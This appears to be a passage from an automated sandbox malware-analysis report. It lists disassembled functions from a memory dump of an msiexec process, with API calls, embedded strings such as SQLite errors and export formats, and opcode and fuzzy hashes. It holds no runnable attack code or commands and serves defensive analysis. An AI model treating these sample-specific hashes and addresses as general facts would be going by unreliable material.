                                                                            • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                            Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                            • API String ID: 3510742995-2446657581
                                                                            • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                            • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                            • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                            • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                            Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                            • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                            • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                            • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                            • memset.MSVCRT ref: 00405ABB
                                                                            • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                            • SetFocus.USER32(?), ref: 00405B76
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$FocusItemmemset
                                                                            • String ID:
                                                                            • API String ID: 4281309102-0
                                                                            • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                            • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                            • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                            • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                            Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintfwcscat
                                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                            • API String ID: 384018552-4153097237
                                                                            • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                            • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                            • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                            • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                            Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                                                            • String ID: 0$6
                                                                            • API String ID: 2029023288-3849865405
                                                                            • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                            • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                            • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                            • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                            Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                            • memset.MSVCRT ref: 00405455
                                                                            • memset.MSVCRT ref: 0040546C
                                                                            • memset.MSVCRT ref: 00405483
                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$memcpy$ErrorLast
                                                                            • String ID: 6$\
                                                                            • API String ID: 404372293-1284684873
                                                                            • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                            • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                            Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesErrorFileLastSleep$free
                                                                            • String ID:
                                                                            • API String ID: 1470729244-0
                                                                            • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                            • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                            Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                            • wcscpy.MSVCRT ref: 0040A0D9
                                                                            • wcscat.MSVCRT ref: 0040A0E6
                                                                            • wcscat.MSVCRT ref: 0040A0F5
                                                                            • wcscpy.MSVCRT ref: 0040A107
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                            • String ID:
                                                                            • API String ID: 1331804452-0
                                                                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                            Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                            • String ID: advapi32.dll
                                                                            • API String ID: 2012295524-4050573280
                                                                            • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                            • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                            Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • <%s>, xrefs: 004100A6
                                                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_snwprintf
                                                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                            • API String ID: 3473751417-2880344631
                                                                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                            Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcscat$_snwprintfmemset
                                                                            • String ID: %2.2X
                                                                            • API String ID: 2521778956-791839006
                                                                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                            Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintfwcscpy
                                                                            • String ID: dialog_%d$general$menu_%d$strings
                                                                            • API String ID: 999028693-502967061
                                                                            • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                            • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                            Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • strlen.MSVCRT ref: 00408DFA
                                                                              • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                            • memset.MSVCRT ref: 00408E46
                                                                            • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                            • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 2350177629-0
                                                                            • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                            • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                            • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                            • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                            Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                            • API String ID: 2221118986-1606337402
                                                                            • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                            • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                            • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                            • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                            Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                            • memset.MSVCRT ref: 00408FD4
                                                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                            • memset.MSVCRT ref: 00409042
                                                                            • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                              • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                            • String ID:
                                                                            • API String ID: 265355444-0
                                                                            • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                            • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                            • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                            • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                            Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004116FF
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                            • API String ID: 2618321458-3614832568
                                                                            • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                            • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                            Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFilefreememset
                                                                            • String ID:
                                                                            • API String ID: 2507021081-0
                                                                            • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                            • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                            Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                            • malloc.MSVCRT ref: 00417524
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                            • free.MSVCRT ref: 00417544
                                                                            • free.MSVCRT ref: 00417562
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                            • String ID:
                                                                            • API String ID: 4131324427-0
                                                                            • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                            • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                            Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                            • free.MSVCRT ref: 0041822B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PathTemp$free
                                                                            • String ID: %s\etilqs_$etilqs_
                                                                            • API String ID: 924794160-1420421710
                                                                            • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                            • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                            Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040FDD5
                                                                              • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                            • _snwprintf.MSVCRT ref: 0040FE1F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                            • String ID: <%s>%s</%s>$</item>$<item>
                                                                            • API String ID: 1775345501-2769808009
                                                                            • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                            • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                            • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                            • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                            Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastMessage_snwprintf
                                                                            • String ID: Error$Error %d: %s
                                                                            • API String ID: 313946961-1552265934
                                                                            • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                            • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                            • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                            • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                            Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: foreign key constraint failed$new$oid$old
                                                                            • API String ID: 0-1953309616
                                                                            • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                            • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                            • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                            • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                            Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
